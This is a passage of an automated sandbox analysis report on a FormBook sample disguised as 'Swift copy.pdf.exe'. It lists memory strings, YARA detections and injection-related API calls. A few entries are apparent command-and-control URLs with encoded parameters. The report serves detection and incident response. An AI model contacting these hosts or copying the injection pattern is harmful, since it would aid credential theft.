          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commH
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/n
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/z
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=1
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Y
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Aq
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o.H
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Swift copy.pdf.exe, 00000000.00000003.332090387.0000000005765000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cscript.exe, 0000000A.00000002.591457906.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.stepmed.life/ifne/?AjR=cNnBXpKXSwxtuHjKs6rP8ZpLsoLiQU1uQw7AksJLx/bmQGd
          Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Swift copy.pdf.exe, 00000000.00000003.328467490.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comS~
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnd&~u
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.n
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cns
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D23BBC NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004181AA NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03128390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03128260 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031282E0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031281B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031281AA NtCreateFile,
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_00D0C2B0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_00D09968
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580040
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583C68
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580006
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583619
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583890
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02586E48
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583EFA
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583E8B
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580F6F
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580F80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2C4D0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2E570
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D221A8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25140
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2DC78
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D21DD8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2FAC0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D26A20
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D24B80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25B80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D248A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25613
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25620
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D28470
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D28460
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D28278
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D250F3
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D221A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D29113
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25133
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D29120
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_001C2050
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4_2_00112050
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00408C50
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B493
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041C585
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402D88
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041C591
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00502050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A020A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04930D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A022AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04956E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312C591
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312C585
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03118C50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B493
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0493B150 appears 35 times
          Source: Swift copy.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.349185865.00000000001C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362132971.0000000006F50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362079019.0000000006D30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000004.00000002.347496434.0000000000112000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.390364207.000000000131F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389481115.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@10/7
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
